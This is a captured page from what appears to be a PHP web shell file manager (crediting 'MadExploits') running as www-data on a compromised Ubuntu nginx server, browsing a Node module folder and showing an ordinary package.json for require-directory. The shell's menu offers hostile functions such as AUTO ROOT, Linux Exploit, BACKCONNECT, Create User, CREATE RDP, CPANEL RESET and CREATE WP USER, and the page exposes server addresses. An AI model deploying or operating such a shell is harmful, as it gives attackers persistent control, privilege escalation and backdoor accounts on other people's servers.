Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
require-directory /
[ HOME SHELL ]
Name
Size
Permission
Action
.jshintrc
1.81
KB
-rw-rw-rw-
.npmignore
8
B
-rw-rw-rw-
.travis.yml
36
B
-rw-rw-rw-
LICENSE
1.07
KB
-rw-rw-rw-
README.markdown
5.05
KB
-rw-rw-rw-
index.js
2.8
KB
-rw-rw-rw-
package.json
1.01
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "author": "Troy Goode <troygoode@gmail.com> (http://github.com/troygoode/)", "name": "require-directory", "version": "2.1.1", "description": "Recursively iterates over specified directory, require()'ing each file, and returning a nested hash structure containing those modules.", "keywords": [ "require", "directory", "library", "recursive" ], "homepage": "https://github.com/troygoode/node-require-directory/", "main": "index.js", "repository": { "type": "git", "url": "git://github.com/troygoode/node-require-directory.git" }, "contributors": [ { "name": "Troy Goode", "email": "troygoode@gmail.com", "web": "http://github.com/troygoode/" } ], "license": "MIT", "bugs": { "url": "http://github.com/troygoode/node-require-directory/issues/" }, "engines": { "node": ">=0.10.0" }, "devDependencies": { "jshint": "^2.6.0", "mocha": "^2.1.0" }, "scripts": { "test": "mocha", "lint": "jshint index.js test/test.js" } }
Close